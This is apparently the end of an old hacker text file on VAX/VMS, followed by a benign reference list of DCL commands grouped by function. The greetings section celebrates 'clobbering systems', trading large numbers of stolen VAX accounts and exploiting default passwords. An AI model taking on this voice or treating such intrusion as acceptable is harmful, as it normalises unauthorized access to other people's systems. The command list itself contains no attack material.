Disk Weasel   - for getting me started into VAX/VMS hacking in the first place!
                (thanks Catherine for introducing us!)
Jetscream     - for all the late night hacking sessions clobbering systems!
Wonder Warthog- for so freely sharing 5 billion VAX accounts with me.  The man
                with infinite defaults..how does he do it!?...haha
The Keeper & Flex Motta- for sharing many a system with me
Rod & Scott  (SRB tech)- thanks for all the technical help!
Cottapin, Piper, Par, Snooty and the rest of the ALTOS gang for all the
interesting talks...

See ya around!

E N T I T Y

Corrupt Computing Canada!

DCL REFERENCE SECTION
---------------------

  Rather than provide a DCL dictionary, I thought it would be more appropriate
for a beginners file to include a section that separates some of the more
useful commands according to function:

-------------------------------------------------------------------------------
1. Submitting batch and print jobs and controlling batch and print queues.

ASSIGN/MERGE      Moves jobs from one queue to another.
ASSIGN/QUEUE      Assigns a queue to a device.
DEASSIGN/QUEUE    Deassigns a queue from a device.
DELETE/ENTRY      Deletes a job or jobs from a queue.
DELETE/QUEUE      Deletes a queue and all its jobs.
INITIALIZE/QUEUE  Creates and initializes a queue.
PRINT             Places a job in a print queue.
SET QUEUE         Changes the current status or attributes of a queue.
SET QUEUE/ENTRY   Changes the attributes of a job.
SHOW PRINTER      Displays default characteristics defined for a printer.
SHOW QUEUE        Displays the attributes of the jobs in a queue.
START/QUEUE       Starts or restarts a queue.
STOP/QUEUE        Stops a queue.
SUBMIT            Places a job in a batch queue.
SYNCHRONIZE       Suspends processing until a specified job completes.

-------------------------------------------------------------------------------
2. Performing operations specific to command procedures.

DECK              Marks the beginning of a special input stream.
DELETE/SYMBOL     Deletes one or more names from a symbol table.
EOD               Marks the end of a special input stream.
EXIT              Terminates a command procedure.
GOTO              Transfers control to a label in a command procedure.
IF                Executes a command only if an expression is true.
INQUIRE           Requests input and assigns the result to a symbol.
ON                Specifies an action to perform when a condition occurs.
SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.
SET ON            Sets error checking on or off.
SET RESTART_VALUE Sets the value of a batch job restart symbol.
SET VERIFY        Displays command input as it is read.
SHOW SYMBOL       Displays the value of a symbol.
WAIT              Suspends processing for a specified period of time.
OPEN              Makes a file available for reading or writing.
CLOSE             Terminates processing of a file.
READ              Reads and optionally deletes a record from an open file.
WRITE             Writes a record to an open file.

-------------------------------------------------------------------------------
3. Communicating with other people using the system.

MAIL              Sends/reads messages to/from other users.
PHONE             Permits users to communicate by typing messages to
                  one another's terminal screens.
REPLY             Displays a message on one or more terminal screens.
REQUEST           Displays a message on the operator's console.
SHOW USERS        Lists the interactive users on the system.

-------------------------------------------------------------------------------
4. Create and switch control between user processes.

LOGOUT            Terminates an interactive terminal session.
SET PASSWORD      Changes your password.
ANALYZE/PROCESS   Analyzes a process dump.
ATTACH            Switches your terminal between SPAWNed processes.
CONNECT           Connects a physical terminal to a virtual terminal.
DISCONNECT        Disconnects a physical terminal from a virtual terminal.
PRINT             Creates a print job.
RUN/PROCESS       Creates a detached process or subprocess.
SET HOST          Connects your terminal to another system via DECnet.
SHOW NETWORK      Displays the nodes you can reach from your system.
SPAWN             Creates a subprocess with a similar environment.
SUBMIT            Creates a batch job.

-------------------------------------------------------------------------------
5. Creating and debugging images.

ANALYZE/IMAGE     Analyzes an image file.
ANALYZE/OBJECT    Analyzes an object module.
DEBUG             Invokes the symbolic debugger after a CTRL/Y.
DEPOSIT           Changes the contents of memory.
DIFFERENCES       Displays differences in content between two files.
DUMP              Displays the uninterpreted contents of a file.
EDIT              Creates (optionally) and edits a file.
EXAMINE           Displays the contents of memory.
LIBRARY           Creates or modifies various kinds of libraries.
LINK              Creates images from object modules.
MACRO             Creates object modules from macro source programs.
MESSAGE           Creates object modules from message source programs.
PATCH             Patches an image.
RUN               Runs an executable image.
SET COMMAND       Updates the commands available to the process.

-------------------------------------------------------------------------------
6. Running executable images.

CANCEL            Cancels a scheduled wakeup request.
CONTINUE          Resumes execution of an interrupted command.
DEBUG             Invokes the VAX/VMS debugger after a CTRL/Y.
DEPOSIT           Changes the contents of memory.
EXAMINE           Displays the contents of memory.
EXIT              Terminates execution of an image or command procedure.
RUN               Runs an image.
SET COMMAND       Updates the commands available to the process.
STOP              Abruptly terminates execution of an image, process, or
                  command procedure.

-------------------------------------------------------------------------------
7. Saving and cataloging information on storage devices.

APPEND            Appends one file to another.
COPY              Creates a copy of an existing file or files.
CREATE            Creates a new file.
DELETE            Deletes a file or files.
DIFFERENCES       Displays differences in content between two files.
DIRECTORY         Displays the names of the files in a directory.
EDIT              Creates (optionally) and edits a file.
MERGE             Merges sorted files.
PRINT             Prints the contents of a file.
PURGE             Deletes old versions of a file or files.
RENAME            Recatalogs an existing file.
SEARCH            Locates a character string within a file or files.
SORT              Sorts the data in a file.
TYPE              Displays the contents of a file.
SET DEFAULT       Changes the default device and directory.
SHOW DEFAULT      Displays the default device and directory.
ANALYZE/RMS_FILE  Analyzes the internal structure of a file.
CONVERT           Changes the attributes of a file.
CONVERT/RECLAIM   Reclaims unused space in an indexed file.
CREATE/DIRECTORY  Creates a new directory or subdirectory.
CREATE/FDL        Creates a new file with tailored attributes.
DUMP              Displays the uninterpreted contents of a file.
EDIT/FDL          Creates a file definition file.
EDIT/SUM          Updates a file with multiple files of edit commands.
EXCHANGE          Reformats files formatted by other operating systems.
LIBRARY           Creates or modifies various kinds of libraries.
RUNOFF            Formats one or more documents (text files).
SET DIRECTORY     Changes the characteristics of a directory.
SET FILE          Changes the characteristics of a file.
SET PROTECTION    Changes the protection of a file.
SET PROTECT/DEF   Changes the default protection given to files.
SET RMS_DEFAULT   Changes the default block and buffer count values.
SHOW PROTECTION   Displays the default protection.
SHOW QUOTA        Displays your quota of space on a disk volume.
SHOW RMS_DEFAULT  Displays the default block and buffer count values.
UNLOCK            Closes a file accidentally left open.

-------------------------------------------------------------------------------
8. Using higher-level names in place of device and file names.

ASSIGN            Equates a logical name to an equivalence string.
CREATE/NAME_TABLE Creates a logical name table.
DEASSIGN          Deletes a logical name.
DEFINE            Equates a logical name to an equivalence string.
SHOW LOGICAL      Displays logical names and their equivalencies.
SHOW TRANSLATION  Displays a logical name and its first equivalence.

-------------------------------------------------------------------------------
9. Using physical devices.

ALLOCATE          Allocates a device for your exclusive use.
DEALLOCATE        Releases an allocated device for general use.
DISMOUNT          Makes a storage device unavailable for processing.
INITIALIZE        Formats a storage device.
MOUNT             Makes a storage device available for processing.
ANALYZE/DISK      Checks the readability and validity of disks.
ANALYZE/ERROR_LOG Displays the contents of the system error log.
ANALYZE/MEDIA     Analyzes the format of a storage device.
BACKUP            Saves or restores files from storage devices.
SET CARD_READER   Sets the translation mode for a card reader.
SET DEVICE        Sets device characteristics.
SET MAGTAPE       Sets magnetic tape device characteristics.
SET PRINTER       Sets line printer characteristics.
SET PROTECT/DEV   Sets protection on a non-files device.
SET VOLUME        Sets mounted volume characteristics.
SHOW DEVICES      Displays the status of devices.
SHOW ERROR        Displays device error counts.
SHOW MAGTAPE      Displays magnetic tape characteristics.
SHOW PRINTER      Displays line printer characteristics.

-------------------------------------------------------------------------------
10. Monitoring, maintaining, tuning, and trouble-shooting the system.

ACCOUNTING        Collects, records, and reports accounting information.
ANALYZE/CRASH     Analyzes a system dump.
ANALYZE/DISK      Checks the readability and validity of disks.
ANALYZE/ERROR_LOG Displays the contents of the system error log.
ANALYZE/MEDIA     Analyzes the format of a storage device.
ANALYZE/RMS_FILE  Analyzes the internal structure of a file.
ANALYZE/SYSTEM    Analyzes the running system.
BACKUP            Saves or restores files from storage devices.
MONITOR           Displays performance information on the running system.
REPLY             Displays a message on one or more terminal screens.
REQUEST           Displays a message on the operator's console.
SET ACCOUNTING    Initializes the accounting log file.
SET AUDIT         Enables auditing of security events.
SET COMMAND       Updates the commands available to the system.
SET DAY           Changes the day type.
SET LOGINS        Sets a limit on the number of interactive users.
SET TIME          Resets the system clock.
SHOW ERROR        Displays processor, memory, and device error counts.
SHOW MEMORY       Displays usage information on memory.
SHOW SYSTEM       Lists the processes on the running system.
SHOW USER         Lists the interactive users on the running system.

-------------------------------------------------------------------------------
11. Manipulating your terminal-specific interactive environment

CONNECT           Connects a physical terminal to a virtual terminal.
DEFINE/KEY        Equates terminal function keys to command lines.
DELETE/KEY        Deletes a terminal function key definition.
DISCONNECT        Disconnects a physical terminal from a virtual terminal.
RECALL            Recalls previously entered interactive commands.
SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.
SET HOST          Connects your terminal to another system via DECnet.
SET PROMPT        Sets the interactive command prompt.
SET TERMINAL      Sets terminal characteristics.
SHOW KEY          Displays one or more function key definitions.
SHOW TERMINAL     Displays terminal characteristics.

-------------------------------------------------------------------------------
12. Examining and controlling the user environment.

SET COMMAND       Updates the commands available to the process.
SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.
SET DEFAULT       Changes the default device and directory.
SET HOST          Connects your terminal to another system via DECnet.
SET MESSAGE       Overrides or supplements system messages.
SET PASSWORD      Changes your password.
SET PROCESS       Changes your process characteristics.
SET PROMPT        Sets the interactive command prompt.
SET PROTECT/DEF   Changes the default protection given to files.
SET RMS_DEFAULT   Changes the default block and buffer count values.
SET UIC           Changes the UIC of your process.
SET WORKING_SET   Changes your working set limit or quota.
SHOW DEFAULT      Displays the default device and directory.
SHOW KEY          Displays one or more function key definitions.
SHOW LOGICAL      Displays logical names and their equivalencies.
SHOW PROCESS      Displays your process characteristics.
SHOW PROTECTION   Displays the default protection.
SHOW QUOTA        Displays your quota of space on a disk volume.
SHOW RMS_DEFAULT  Displays the default block and buffer count values.
SHOW STATUS       Displays brief process characteristics.
SHOW SYMBOL       Displays the value of a symbol.
SHOW TERMINAL     Displays terminal characteristics.
SHOW TIME         Displays the current date and time.
SHOW TRANSLATION  Displays a logical name and its first equivalence.
SHOW WORKING_SET  Displays your working set limit and quota.

-------------------------------------------------------------------------------